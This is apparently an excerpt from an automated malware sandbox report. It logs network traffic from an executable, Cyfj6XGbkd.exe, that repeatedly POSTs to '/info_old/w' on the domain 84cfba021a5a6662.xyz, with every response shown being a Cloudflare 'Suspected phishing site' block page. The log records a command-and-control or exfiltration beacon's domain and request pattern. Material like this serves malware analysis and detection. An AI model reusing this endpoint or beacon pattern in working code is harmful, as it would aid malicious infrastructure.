                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 82
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:38.379690886 CET | 105 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b4900004c7a80bc4000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J4ah8qzvvpxv%2BczEwA4ETXiFYM2G6PafyMoa%2BTIAPCky3zl9vDsHg%2B9on5W1BxDxKklki0N0iUmMs72VHFoCwLeoOUZPPRWogFvnfJ58%2B%2FtsA3BoUw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8baafc4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view
Jan 29, 2021 17:36:38.392950058 CET | 110 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:38.444030046 CET | 112 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b9c00004c7abb17b000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1TTxIsaBFLlODcFyVV2xP5OLGeOWNBxGyY%2B5l4VYhIX0LLTZs1rFGw%2BLFa2pD%2BFRCB35fr4x%2BzZQjEEecuGAh3F8lttgXT7%2B%2FWV5SUUhHIhsH3AJhg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8c2c9d4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
Jan 29, 2021 17:36:38.555047035 CET | 116 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:38.608758926 CET | 118 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0c3f00004c7a989ee000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DNXVjPu5uwOmj99TlOOlAhMHoU%2F5YEqSEKFA8SUaJnYFWZXV0KUhm8zsKTx5eNn0ZKjJppKl8FGwSslOHQla1m%2BkGiweMsOpYugdajbxJfYjsXN%2FOg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8d3fd04c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
                                                                                                                                                     Jan 29, 2021 17:36:40.871623993 CET | 149 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                     Jan 29, 2021 17:36:40.932384968 CET | 150 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d62a03f41afb9e90cff91933b2a7bb33a1611938200; expires=Sun, 28-Feb-21 16:36:40 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a154f00004c7ae8157000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cuqf45jSp%2Bm%2F3k0sv4SqMBJcKL7rdKkeo73x6od7TLqTgJ2Xnh4uuFmcj8wx7JbDVqLdNq%2Bs8VpaHSE7CEV5Yw8A77L2yb0UxxYccLy5T1q4VLIPgQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f9bbcda4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                     1 | 192.168.2.6 | 49729 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                     Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                     Jan 29, 2021 17:36:46.603761911 CET | 168 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                     Jan 29, 2021 17:36:46.695880890 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d24bdaf5c7addfa487e548b267849589e1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2bb10000c7714b022000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3WbUPNX0Q33l2fVJSYmLl0c0RPUwHvKFKwstASSbw4zStXrHdk7pR3qp9oXUJqZaHDIplqJGYjfYpfH3VAWB6bDXWgOVgqa6bDpzhIhib1vgGJngsw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fbf8d11c771-AMS
                                                                                                                                                     Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
                                                                                                                                                     Jan 29, 2021 17:36:49.255383968 CET | 181 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                     Jan 29, 2021 17:36:49.311367989 CET | 183 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:49 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
